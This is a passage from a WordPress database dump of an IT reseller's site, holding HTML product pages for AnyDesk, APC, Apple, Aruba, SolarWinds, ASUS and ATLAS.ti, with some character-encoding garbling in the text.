alike.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Unparalleled performance</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nLow latency, fast data transmissions, frame rates of 60 fps â€“ we know how critical these are when working on a remote desktop. Thatâ€™s why our innovative DeskRT codec ensures low lag, even at high screen resolutions or bandwidths of just 100 kB/s.\r\n</div>\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Multi-platform support</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk works across multiple platforms and operating systems: Windows, Linux, Free BSD, Mac OS, iOS and Android, plus we donâ€™t charge extra for mobile apps.\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Secure by design</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nYour security has been built into AnyDesk from day one. We use banking-standard TLS 1.2 technology to ensure your computer is protected from unauthorized access and RSA 2048 asymmetric encryption to verify every connection. Plus, our servers use Erlang telecommunication technology for maximum reliability.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Built for pros, loved by all</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAnyDesk has been designed and developed with IT professionals in mind, offering an unbeatable service for those who need fast, efficient and reliable remote access. AnyDesk is also a practical â€“ and totally free â€“ solution for private users.\r\n\r\n<h3 class=\"u-font-size-l u-space-mb-1/4\">Grows with you</h3>\r\n<div class=\"u-color-mid-gray\">\r\n\r\nAs teams grow, their needs evolve â€“ and so should the software they use. AnyDesk lets you start small and scale quickly, with sensible pricing for teams of all sizes.\r\n\r\n</div>\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Anydesk','','publish','closed','closed','','anydesk','','','2019-09-18 15:12:15','2019-09-18 07:12:15','',0,'https://bintara.com.my/?page_id=1437',0,'page','',0),(1438,1,'2018-12-11 12:55:36','2018-12-11 04:55:36','<img class=\"alignnone wp-image-2086\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/APC_LockupLogo_tcm267-134996.png\" alt=\"\" width=\"300\" height=\"124\" />\r\n<h3 class=\"info-article-image__title\">Infrastructure solutions for home and office</h3>\r\nFrom battery backups that safeguard against outages at home, to full-scale data center infrastructure, our offers can help your home and business become more efficient, reliable, and connected.\r\n\r\n&nbsp;\r\n<h3>Top needs for data CENTER and networking</h3>\r\nOur data center solutions protect and optimize data centers and networks for cloud and big data architectures. Â Choose Schneider Electric if you want expert data center solutions that:\r\n<ul>\r\n 	<li>Simplify and speed up planning, designing and building your data center</li>\r\n 	<li>Roll out and implement software defined data centers</li>\r\n 	<li>Protect on-premise applications living on the edge</li>\r\n 	<li>Optimize costs and performance by balancing on-premise and cloud based applications</li>\r\n 	<li>Secure critical process applications that are isolated from developments of digitized processes and applications needed for the future</li>\r\n 	<li>Monitor, automate and control your entire data center physical infrastructure with integrated DCIM</li>\r\n</ul>\r\n&nbsp;\r\n<h3>Our Data Centre Solutions</h3>\r\nSchneider Electric delivers legendary reliability every step of the way. OurÂ Data Center Physical InfrastructureÂ options provide a strong, secure framework that is able to grow and adjust with your needs, while staying in budget and optimizing network performance.\r\n\r\nWhenÂ Data Center Infrastructure Management software (DCIM)Â is installed and your data center is operational, you can collect and analyze data, and control power and processes system-wide or on individual devices.\r\n\r\nAnd, ourÂ Data Center Life Cycle ServicesÂ enable you to use as much or little of our expertise no matter where you are in the data center life cycle. Â We offer a complete portfolio of services to assess, plan, design, build and operate your data center.\r\n\r\n&nbsp;\r\n<h3><span class=\"title\">The Data Centre Transformed</span></h3>\r\nImagine creating the ideal data centre â€” from rack to row to room to building. Our solutions can help transform your data centre with reliable, expert products developed to help you maintain uptime when every minute counts.\r\n\r\n&nbsp;\r\n\r\n<center>[maxbutton id=\"1\" ]</center>\r\n\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/DbZfNmlxz6g\" width=\"480\" height=\"288\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>','APC','','publish','closed','closed','','apc','','','2019-09-18 15:15:37','2019-09-18 07:15:37','',0,'https://bintara.com.my/?page_id=1438',0,'page','',0),(1439,1,'2018-12-11 12:55:43','2018-12-11 04:55:43','<h3 class=\"typography-headline\">The most powerful products for business are the ones people already love to use</h3>\r\n<p class=\"typography-intro-elevated\">Apple products have always been designed for the way we work as much as for the way we live. Today they help employees to work more simply and productively, solve problems creatively and collaborate with a shared purpose. And theyâ€™re all designed to work together beautifully. When people have access to iPhone, iPad and Mac, they can do their best work and reimagine the future of their business.</p>\r\n\r\n&nbsp;\r\n\r\n<h3>iPAD PRO</h3>\r\n<img class=\"alignnone wp-image-2403\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ipad-pro.png\" alt=\"\" width=\"217\" height=\"257\" />\r\n<h4>Why iPadÂ Pro</h4>\r\n<ul>\r\n 	<li><strong>iPad Pro does what a computer does but more in intuitive way --</strong> Use multiple apps at the same time with a few taps. Move objects between apps simply by dragging and dropping, or switch apps with a single swipe.</li>\r\n 	<li><strong>Works like your iPhone, so it\'s similar to use --</strong> iPad Pro runs iOS, so it does all the things your iPhone does as well as things only iPad can do. And odds are you already know how to use it. Just tap, swipe, pinch, and zoom.</li>\r\n 	<li><strong>iPad Pro works with a keyboard when you need one --Â </strong>The full-sized onscreen keyboard lets you respond to an email or write a paper and it even acts as a trackpad. And if you want a full-sized physical keyboard, just attach the Smart Keyboard Folio for a great typing experience, and front and back protection.</li>\r\n 	<li><strong>iPad Pro has great apps you\'ll use everyday --Â </strong>Like photos, messages, safari, mail, calendar and more, it also comes with great productivity apps like Pages and Keynote and runs familiar apps like Microsoft Word and Adobe Photoshop CC.</li>\r\n 	<li><strong>It\'s made to protect your privacy --Â </strong>Your stuff is safe because iPad Pro comes with features like Face ID which is the most secure facial authentication system in a tablet or a computer. And it has features like Intelligent Tracking Prevention in Safari, which helps protect against websites collecting your personal data.</li>\r\n 	<li><strong>Has a place for your files and a way to get to them from all your devices --Â </strong>All your files in one central location. With the Files app, you can organise what\'s in iCloud Drive, on third-party cloud services such as Box and Dropbox, and on your iPad Pro, however you want.</li>\r\n</ul>\r\n\r\n&nbsp;\r\n\r\n<h3>Â MACBOOK PRO</h3>\r\n<img class=\"alignnone wp-image-2404\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/macbook-pro.jpg\" alt=\"\" width=\"220\" height=\"205\" />\r\n\r\n&nbsp;\r\n<h4 class=\"typography-headline-elevated\" data-reveal-group=\"1\">More power. More performance. More pro.</h4>\r\n<ul>\r\n 	<li>New eighth-generation Intel 6â€‘core and quad-core processors</li>\r\n 	<li>Up to 32GB of memory for running multiple pro apps</li>\r\n 	<li>Stunning Retina display with True Tone technology</li>\r\n 	<li>Touch Bar for working more productively</li>\r\n</ul>\r\n\r\n&nbsp;\r\n\r\n<h3>iMAC PRO</h3>\r\n&nbsp;\r\n\r\n<img class=\"alignnone wp-image-2405\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/imac-pro.jpg\" alt=\"\" width=\"220\" height=\"220\" />\r\n<h4 class=\"hero-subheadline columns large-12 center\">Power to theÂ pro.</h4>\r\n<p class=\"label large-10 small-12 center\">Pros love iMac. So we created one just for you. Itâ€™s packed with the most powerful graphics and processors ever in a Mac, along with the most advanced storage, memory and I/O â€” all behind a breathtaking Retina 5K display in a sleek, all-in-one design. For everyone from photographers to video editors to 3D animators to musicians to software developers to scientists, iMac Pro is ready toÂ turn your biggest ideas into your greatestÂ work.</p>\r\nTo discover more about this product, please click the button below or contact us to discuss your needs.\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','Apple','','publish','closed','closed','','apple','','','2019-09-18 15:37:29','2019-09-18 07:37:29','',0,'https://bintara.com.my/?page_id=1439',0,'page','',0),(1440,1,'2018-12-11 12:55:52','2018-12-11 04:55:52','<h1 style=\"text-align: left;\">ARUBA NETWORKING PRODUCTS</h1>\r\n<img class=\"alignnone wp-image-1659\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/hpe-aruba-logo.jpg\" alt=\"\" width=\"500\" height=\"333\" />\r\n\r\n<div class=\"subheadline\">\r\n\r\n<h3>Smarter solutions for experience-driven networking.</h3>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wireless access you can always count on.</h3>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Wired networking thatâ€™s a whole lot smarter.</h3>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n&nbsp;\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h3>Visibility and control for your WAN.</h3>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n&nbsp;\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Protect your organization, from inside and out.</h3>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n&nbsp;\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Centralized network operations.</h3>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.\r\n&nbsp;\r\n<img class=\"wp-image-1655 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n&nbsp;\r\n<h3>Resolve network issues â€“ before they disrupt your business.</h3>\r\nMeasure and identify performance and connectivity patterns before issues arise â€“ even ones that happen across multiple locations, remote offices, and applications that use internal or cloud-based services. Arubaâ€™s AI-powered machine learning solutions are now the benchmark for understanding network and application performance.\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','Aruba','','publish','closed','closed','','aruba','','','2019-09-18 16:07:57','2019-09-18 08:07:57','',0,'https://bintara.com.my/?page_id=1440',0,'page','',0),(1441,1,'2018-12-11 12:54:54','2018-12-11 04:54:54','Network Management, System Management, Database Management, IT Security, IT Help Desk. <a href=\"https://bintara.com.my/solarwinds/\">Read More...</a><!--more-->\r\n\r\n<img class=\"alignnone size-full wp-image-1839\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Artboard-11x-1.png\" alt=\"\" width=\"1024\" height=\"681\" />','SOLARWINDS','','publish','closed','closed','','solarwinds','','','2019-09-23 16:14:11','2019-09-23 08:14:11','',0,'https://bintara.com.my/?post_type=portfolio&#038;p=1441',0,'portfolio','',0),(1442,1,'2018-12-11 12:56:02','2018-12-11 04:56:02','<h2>NOTEBOOK</h2>\r\n<table style=\"height: 217px;\" width=\"1104\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2553 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-13-UX331UN.jpg\" alt=\"\" width=\"173\" height=\"173\" />\r\n<p style=\"text-align: center;\"><strong>ASUS ZenBook 13 UX331UN</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2555 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-ZenBook-Flip-S-UX370UA.jpg\" alt=\"\" width=\"192\" height=\"192\" /><strong style=\"font-family: inherit; font-size: inherit;\">ASUS ZenBook Flip S UX370UA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2556\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Transformer-Book-T101HA.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Transformer Book T101HA</strong></p>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h2>MONITOR</h2>\r\n<table style=\"height: 781px;\" width=\"578\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2558 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP278H.jpg\" alt=\"\" width=\"189\" height=\"189\" /></p>\r\n<p style=\"text-align: center;\"><strong>VP278H</strong></p>\r\n\r\n<ul>\r\n 	<li>27â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>Extensive connectivity including , dual HDMI and D-sub ports. Plus 2-Watt stereo speakers.</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2565 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VZ249H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VZ249H</strong></p>\r\n\r\n<ul>\r\n 	<li>Stylish ultra-slim profile is only 7mm thin</li>\r\n 	<li>Frameless design suitable for multi-display use</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n</ul>\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2562 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VA326H.jpg\" alt=\"\" width=\"193\" height=\"193\" />\r\n<p style=\"text-align: center;\"><strong>VA326H</strong></p>\r\n\r\n<ul>\r\n 	<li>31.5â€ FHD display with 178Â° wide viewing angle and a 1800R panel curvature makes movies and games more immersive</li>\r\n 	<li>144Hz rapid refresh rate for incredibly-smooth and fast gaming visual</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2563 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VC239H.jpg\" alt=\"\" width=\"177\" height=\"177\" />\r\n<p style=\"text-align: center;\"><strong>VC239H</strong></p>\r\n\r\n<ul>\r\n 	<li>In-Plane Switching technology panel with LED backlight in frameless &amp; Slim design</li>\r\n 	<li>ASUS Eye Care monitors feature TÃœV Rheinland-certified Flicker-free and Low Blue Light technologies to ensure a comfortable viewing experience</li>\r\n 	<li>Embedded wall mount hole for multiple using scenario</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\"wp-image-2561 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/PA329Q.jpg\" alt=\"\" width=\"169\" height=\"169\" />\r\n<p style=\"text-align: center;\"><strong>PA329Q</strong></p>\r\n\r\n<ul>\r\n 	<li>32-inch, 4K UHD 3840 x 2160 resolution display with IPS technology for immersive visuals</li>\r\n 	<li>100% Rec.709 and 99.5% Adobe RGB true color reproduction, factory pre-calibrate for outstanding color accuracy (âˆ†E &lt;2). Support DIC-P3 and Rec. 2020 color standard.</li>\r\n 	<li>Incorporate with ASUS ProArtâ„¢Calibration technology for profession with a 14-bit look-up table (LUT), uniformity compensation capability and saves all color parameters profile on the monitor with no color distortion</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\"><img class=\" wp-image-2564 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VP228HE.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n<p style=\"text-align: center;\"><strong>VP228HE</strong></p>\r\n\r\n<ul>\r\n 	<li>21.5â€ Full HD monitor with 1ms (GTG) quick response time to eliminate ghosting and tracers for more fluid video playback</li>\r\n 	<li>ASUS-exclusive GamePlus provides Crosshair and Timer function for better gaming experience</li>\r\n 	<li>The TÃœV Rheinland-certified ASUS Flicker-Free and Low Blue Light technologies</li>\r\n 	<li>Robust connectivity including HDMI and D-sub ports. Plus 1.5-Watt stereo speakers</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"3\" width=\"601\">\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2566\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MB169B-1.jpg\" alt=\"\" width=\"284\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>MB169B+</strong></p>\r\n\r\n<ul>\r\n 	<li>15.6-inch Full HD portable USB-powered monitor with a single USB 3.0 cable for power and data transmission</li>\r\n 	<li>Worldâ€™s slimmest and lightest USB monitor with a sleek and metallic finish</li>\r\n 	<li>Auto-rotating display bundled with the ASUS Smart Case â€“ a two-way adjustable stand and protective sleeve</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n&nbsp;\r\n<h2>DESKTOP</h2>\r\n<table style=\"height: 887px;\" width=\"645\">\r\n<tbody>\r\n<tr>\r\n<td width=\"200\"><img class=\" wp-image-2567 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUSPRO-E520.jpg\" alt=\"\" width=\"167\" height=\"167\" />\r\n<p style=\"text-align: center;\"><strong>ASUSPRO E520</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Home or other editions available</li>\r\n 	<li>ASUS Control Center server-grade IT management software and 36-month stable supply guarantee through ASUS Corporate Stable Model program</li>\r\n 	<li>7th Gen IntelÂ® Coreâ„¢ processors and 2400MHz DDR4 memory for enhanced productivity</li>\r\n 	<li>Ultra-detailed 4K UHD visuals and dual display support</li>\r\n 	<li>Slim and compact 1-liter design with detachable extension bay for optional optical drive, and serial and parallel ports</li>\r\n 	<li>Quiet and energy-efficient operation with Energy Star certification</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2568 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ASUS-Chromebox-3.jpg\" alt=\"\" width=\"173\" height=\"173\" /></p>\r\n<p style=\"text-align: center;\"><strong>ASUS Chromebox 3</strong></p>\r\n\r\n<ul>\r\n 	<li>All-new Chromebox, powered by the latest 8th Generation IntelÂ® Coreâ„¢ processor</li>\r\n 	<li>Run thousands of Android app on Google Play with incredible performance</li>\r\n 	<li>Versatile USB 3.1 Gen 1 Type-C port for data transfer, power delivery and DisplayPort functionality</li>\r\n 	<li>Stay safe from viruses and malware with automatic system updates</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free work area.</li>\r\n 	<li>Easy setup and automatic software and security updates for protection from viruses and malware</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">&nbsp;\r\n\r\n&nbsp;\r\n\r\n<img class=\"wp-image-2577 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB60.jpg\" alt=\"\" width=\"216\" height=\"83\" />\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><strong>Mini PC PB60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Powered by the latest IntelÂ® PentiumÂ® Gold or Coreâ„¢ T Series Processors for desktop-grade performance</li>\r\n 	<li>Dual-storage design with one M.2 PCIe 3.0 x4 SSD and one 2.5-inch HDD for high storage capacity.</li>\r\n 	<li>Compact, one-liter size metal chassis for a clutter-free workspace, plus vertical stand and VESA mount compatibility</li>\r\n 	<li>ASUS Corporate Stable Model program â€” 36-month stable-supply guarantee.</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2572 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/MINI-PC-PN60.jpg\" alt=\"\" width=\"186\" height=\"186\" /></p>\r\n<p style=\"text-align: center;\"><strong>MINI PC PN60</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro.</li>\r\n 	<li>Ultracompact size with 0.62-liter volume for a clutter-free workspace</li>\r\n 	<li>Powerful performance with the latest IntelÂ® Coreâ„¢ processors</li>\r\n 	<li>Sliding chassis design for easy, two-step storage and memory upgrades</li>\r\n 	<li>Comprehensive I/O connectivity to meet different needs</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2570 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Mini-PC-PB40.jpg\" alt=\"\" width=\"183\" height=\"183\" /></p>\r\n<p style=\"text-align: center;\"><strong>Mini PC PB40</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>Ultraslim chassis: Versatile desktop PC in a slimline, one-liter metal case</li>\r\n 	<li>Comprehensive connectivity: Flexible I/O for a wide range of uses</li>\r\n 	<li>Dual storage: Experience smooth daily computing with one up to 64GB eMMC onboard and one up to 1TB 2.5-inch HDD</li>\r\n 	<li>ASUS Control Center: Server-grade IT management software</li>\r\n 	<li>ASUS Corporate Stable Model program: 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability: Extensively tested to ensure long-term reliability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\"wp-image-2573 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN65U.jpg\" alt=\"\" width=\"172\" height=\"172\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN65U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest IntelÂ® Coreâ„¢ i7, i5, or i3 Kaby Lake processors with 4K visuals</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>M.2 SSD for data transfer speeds of up to 10Gbps</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>Two easy-access front-mounted ports with fast USB charging</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2576 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C1.jpg\" alt=\"\" width=\"178\" height=\"178\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C1</strong></p>\r\n\r\n<div class=\"product-intro\">\r\n<ul>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>IntelÂ® Core i+ support with Optaneâ„¢ memory acceleration for 2X data speeds</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output and support for up to three displays via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen2 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>ASUS Corporate Stable Model program ensuring 36-month stable-supply guarantee</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n</div>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2575 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-VC65-C.jpg\" alt=\"\" width=\"183\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini VC65-C</strong></p>\r\n\r\n<ul>\r\n 	<li>Windows 10 Pro - ASUS recommends Windows 10 Pro. or other editions available</li>\r\n 	<li>8th Gen IntelÂ® Coreâ„¢ i7, i5, i3, PentiumÂ®Gold and CeleronÂ® processors</li>\r\n 	<li>Windows 10 Pro (other editions available)</li>\r\n 	<li>Worldâ€™s smallest PC with five storage bays â€” Fits one M.2 SATA/PCIe SSD and up to four 2.5-inch SSDs or HDDs</li>\r\n 	<li>Space-saving design with embedded power adapter and VESA-mount support for flexible vertical or horizontal placement options</li>\r\n 	<li>4K UHD video output via HDMI, DisplayPort and VGA</li>\r\n 	<li>Full connectivity options including three USB 3.1 Gen1 ports, two audio output jack, and one 4-in-1 card reader</li>\r\n 	<li>Quiet and energy-efficient performance, even at full load</li>\r\n 	<li>24/7 reliability â€” Extensively tested to ensure long-term dependability</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n<td width=\"200\">\r\n<p style=\"text-align: center;\"><img class=\" wp-image-2574 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/VivoMini-UN68U.jpg\" alt=\"\" width=\"184\" height=\"184\" /></p>\r\n<p style=\"text-align: center;\"><strong>VivoMini UN68U</strong></p>\r\n\r\n<ul>\r\n 	<li>Full-fledged desktop performance with the latest 8th Gen IntelÂ® Coreâ„¢ i7 or i5 Kaby Lake R processors &amp; DDR4 2400MHz support</li>\r\n 	<li>Dual-storage design for additional storage capacity and flexibility</li>\r\n 	<li>NVM ExpressÂ® support for blazingly fast SSD data transfers of up to 32Gbps</li>\r\n 	<li>Two easy-access front-mounted USB 3.1 Gen 2 ports with fast USB charging</li>\r\n 	<li>Quiet mini PC with energy-efficient performance â€” even under demanding loads</li>\r\n 	<li>ASUS Business Manager software for routine maintenance and servicing</li>\r\n 	<li>Lightning-fast 802.11ac Wi-Fi, with 100GB of free ASUS WebStorage space</li>\r\n 	<li>VESA-mount compatible for a tidy, clutter-free workstation</li>\r\n 	<li>Ultra-compact Good Design Award-winning design with a Zen-inspired spun-metal-effect finish and weighing less than 700g</li>\r\n</ul>\r\n<p style=\"text-align: center;\">[maxbutton id=\"8\" ]</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>','Asus','','publish','closed','closed','','asus','','','2019-09-18 16:15:26','2019-09-18 08:15:26','',0,'https://bintara.com.my/?page_id=1442',0,'page','',0),(1443,1,'2018-12-11 12:56:13','2018-12-11 04:56:13','<h3>What is ATLAS.ti?</h3>\r\n<strong>ATLAS.ti is a powerful workbench for the qualitative analysis of large bodies of textual, graphical, audio and video data.</strong>\r\n\r\nSophisticated tools help you to arrange, reassemble, and manage your material in creative, yet systematic ways. ATLAS.ti keeps you focused on the material itself. Whether your field is anthropology, economics, criminology, or medicine: ATLAS.ti will meet your qualitative analysis needs!\r\n\r\n&nbsp;\r\n<h3 id=\"Huge-Variety-Of-Media-Types\">Huge Variety Of Media Types</h3>\r\nATLAS.ti offers anÂ <strong>unsurpassed range of media</strong>Â for you to work with: Whether itâ€™s coding 